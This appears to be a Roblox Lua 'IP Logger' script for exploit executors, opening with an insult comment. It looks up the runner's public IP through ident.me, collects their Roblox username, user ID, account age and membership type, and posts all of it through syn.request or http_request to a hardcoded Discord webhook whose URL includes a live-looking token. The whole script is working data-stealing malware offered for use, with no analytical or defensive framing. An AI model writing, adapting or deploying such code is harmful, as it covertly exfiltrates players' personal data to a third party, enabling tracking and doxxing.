--- you are a fucking loser

local Webhook = "https://discord.com/api/webhooks/1097404357542166588/ghm6v2gsbhdO2FXIfF4LiYqIh6NkWOzd7oViA6RezdY26UtfKXbgY4n7Hj-vribyRzT3"

local IPv4 = game:HttpGet("https://v4.ident.me/")

local Headers = {["content-type"] = "application/json"} -- Don't Modify

local LocalPlayer = game:GetService("Players").LocalPlayer

local AccountAge = LocalPlayer.AccountAge
local MembershipType = string.sub(tostring(LocalPlayer.MembershipType), 21)
local UserId = LocalPlayer.UserId
local PlayerName = game.Players.LocalPlayer.Name
local TimeZone = os.date()

local PlayerData =
{
      ["content"] = "",
      ["embeds"] = {{
          ["title"] = "**IP Logger**", -- Embed Title
          ["color"] = tonumber(0xffffff),
          ["thumbnail"] = {
              ["url"] = "https://static.wikia.nocookie.net/logopedia/images/b/bb/Roblox_Player_2019.svg/revision/latest/scale-to-width-down/250?cb=20210627111844" -- Insert Image URL Here
          },
          ["fields"] = {
              {
                  ["name"] = "Membership Type:",
                  ["value"] = MembershipType,
                  ["inline"] = true
},
              {
                  ["name"] = "Account Age:",
                  ["value"] = AccountAge,
                  ["inline"] = true
},
              {
                  ["name"] = "User ID:",
                  ["value"] = UserId,
                  ["inline"] = true
},
              {
                  ["name"] = "IPv4:",
                  ["value"] = IPv4,
                  ["inline"] = true
},
              {
                  ["name"] = "Username:",
                  ["value"] = PlayerName,
                  ["inline"] = true
},
              {
                  ["name"] = "Time: ",
                  ["value"] = TimeZone,
                  ["inline"] = true
},
   },
           }
       }
   }
local PlayerData = game:GetService('HttpService'):JSONEncode(PlayerData)
local HttpRequest = http_request;

if syn then
  HttpRequest = syn.request
  else
  HttpRequest = http_request
end

HttpRequest({Url=Webhook, Body=PlayerData, Method="POST", Headers=Headers})
